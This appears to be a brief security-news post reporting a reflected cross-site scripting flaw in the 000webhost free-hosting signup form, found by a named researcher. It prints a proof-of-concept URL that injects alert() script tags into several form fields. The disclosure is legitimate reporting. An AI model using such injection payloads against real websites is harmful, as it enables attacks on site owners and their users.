000webhost vulnerable to Non-Persistent Cross site scripting

Sponsored Links

One of the Top free web hosting provider, 000WebHost website is found to be vulnerable to Cross site scripting .  The vulnerability was discovered by the Cyber Security Researcher  Vedachala.

Domain name,Subdomain name and email address field in "Order Free Web Hosting" page of the site (000webhost.com) are vulnerable to xss injection.


The web app developer of this site fails to validate those inputs for the special characters that results in this security flaw.

POC code for this security bug:

    http://www.000webhost.com/order.php?domain=\"><script>alert(/e hacking news/)</script>&subdomain=\"><script>alert(/e hacking news/)</scrip&name=\"><script>alert(/E Hacking News/)</script>&email=\"><script>alert(/e hacking news/)</script>&pass1=\"><script>alert(/E Hacking New&pass2=\"><script>alert(/E Hacking New&aggree=yes&error_multiple=1&error_domain=1&error_subdomain=1&error_name=&error_email=1&error_pass=4&error_tos=&error_number=&error_js=&error_disposable=&error_bad_gmail=

The researcher also recently found a reflected xss vulnerability in the Airtel website. 
Category: / / / /

Share this with Your friends:


About Author

, founder of E Hacking News, an Information Security enthusiast who has more interest in PenTesting and Malware analysis. You can find him on Google+ Profile , Twitter and Facebook.